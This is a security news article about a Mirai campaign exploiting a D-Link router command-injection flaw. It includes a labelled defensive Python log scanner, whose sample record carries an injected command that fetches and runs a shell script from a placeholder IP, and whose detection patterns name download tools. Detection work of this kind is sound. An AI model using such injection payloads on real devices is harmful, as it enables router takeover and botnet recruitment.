
New Mirai campaign exploits RCE bug in EoL D-Link routers

A new Mirai-based malware campaign is exploiting CVE-2025-29635, a critical command injection vulnerability in D-Link DIR-823X routers, to enlist vulnerable devices in the botnet.

CVE-2025-29635 allows an attacker to execute arbitrary commands on a vulnerable device by sending a crafted POST request to the affected endpoint, resulting in remote command execution (RCE).

Akamai’s SIRT, which discovered the Mirai campaign in March 2026, reports that, although the flaw was first disclosed 13 months ago by security researchers Wang Jinshuai and Zhao Jiangting, this is the first time exploitation in the wild has been observed.


“Akamai SIRT detected active D-Link command-line exploit attempts to inject CVE-2025-29635 into our global honeypot network in early March 2026,” reads Akamai’s report.

“This vulnerability exists in D-Link DIR-823X series routers in firmware versions 240126 and 24082, and allows an authorized attacker to execute arbitrary commands on remote devices by sending a POST request to the /goform/set_prohibiting endpoint via a corresponding function, which can trigger a remote command.”

Researchers who discovered the bug briefly published a proof-of-concept (PoC) exploit on GitHub, but later retracted it.

Akamai’s observations show that attackers send POST requests whose injected command tries to change into each writable directory in turn, downloads a shell script (dlink.sh) from an external IP address, and executes it.

Recognized POST requests (Source: Akamai)
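As an added example, not code from Akamai’s report or from the article, the following Python scanner runs over constructed honeypot or web-server records and flags the request pattern described above: a POST to /goform/set_prohibiting carrying shell metacharacters, a reference to dlink.sh, or a download from an external IP inside the request body. The JSON-lines log schema, the documentation-range IP addresses and the `mac` parameter name are assumptions made for the example.

```python
import json
import re

# Indicators from the article: the endpoint abused by CVE-2025-29635 and the
# dropper script name. The log schema and all sample values are constructed.
VULN_ENDPOINT = "/goform/set_prohibiting"
DROPPER_NAME = "dlink.sh"

# Shell metacharacters and download/execute commands typical of Mirai droppers
# that hop between writable directories before fetching and running a script.
SHELL_MARKERS = re.compile(r"[;&|`$]|\b(?:cd|wget|curl|tftp|chmod|sh)\b")
DOWNLOAD_FROM_IP = re.compile(r"\b(?:wget|curl|tftp)\b.*\d+\.\d+\.\d+\.\d+")

def classify_request(rec):
    """Return the reasons a logged request (dict: src, method, path, body)
    looks like an exploitation attempt; an empty list means benign."""
    reasons = []
    body = rec.get("body", "")
    on_endpoint = rec.get("method") == "POST" and rec.get("path") == VULN_ENDPOINT
    if on_endpoint and SHELL_MARKERS.search(body):
        reasons.append("command injection attempt against " + VULN_ENDPOINT)
    if DROPPER_NAME in body:
        reasons.append("references the " + DROPPER_NAME + " dropper")
    if DOWNLOAD_FROM_IP.search(body):
        reasons.append("download from an external IP in request body")
    return reasons

def scan_log(lines):
    """Parse JSON-lines records and return (src_ip, reasons) for each hit."""
    hits = []
    for raw in lines:
        if not raw.strip():
            continue
        rec = json.loads(raw)
        reasons = classify_request(rec)
        if reasons:
            hits.append((rec["src"], reasons))
    return hits

# Constructed sample records (documentation-range IPs; "mac" is a placeholder
# parameter). A plain POST without shell markers is normal UI traffic, not flagged.
SAMPLE_LOG = """
{"src": "203.0.113.7", "method": "POST", "path": "/goform/set_prohibiting", "body": "mac=00:11:22:33:44:55;cd /tmp || cd /var/run; wget http://192.0.2.10/dlink.sh; sh dlink.sh"}
{"src": "198.51.100.4", "method": "POST", "path": "/goform/set_prohibiting", "body": "mac=00:11:22:33:44:55"}
{"src": "192.0.2.55", "method": "GET", "path": "/index.html", "body": ""}
""".strip().splitlines()

if __name__ == "__main__":
    for src, reasons in scan_log(SAMPLE_LOG):
        print(src, "->", "; ".join(reasons))
```

Only the first record is reported; the second is a legitimate-looking POST to the same endpoint, which the scanner deliberately leaves alone so that normal router administration does not drown the alert.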

The script includes a Mirai-based malware called “tuxnokill,” which supports multiple architectures.

In terms of capabilities, it includes the Mirai standard distributed denial-of-service (DDoS) attack repertoire, including TCP SYN/ACK/STOMP, UDP flooding, and HTTP null.

Akamai also found that the threat actor behind this campaign is exploiting CVE-2023-1389, which affects TP-Link routers, and a separate RCE flaw in ZTE ZXV10 H108L routers. The same attack pattern was observed in all cases, ending with the deployment of the Mirai payload.

The affected devices reached end-of-life (EoL) in November 2024, so it is possible that the latest firmware available for the model does not address CVE-2025-29635. D-Link doesn’t make exceptions when a working exploit is found, so it’s unlikely that the vendor will offer a fix now.

BleepingComputer has reached out to D-Link with questions about the reported activity and the status of the fix, and we’ll update this post as soon as we hear back.

Meanwhile, users of routers that have reached EoL are advised to upgrade to a newer model that is still actively supported and receives regular security updates, disable remote management portals if they are not needed, change default administrator passwords, and monitor for unexpected configuration changes.
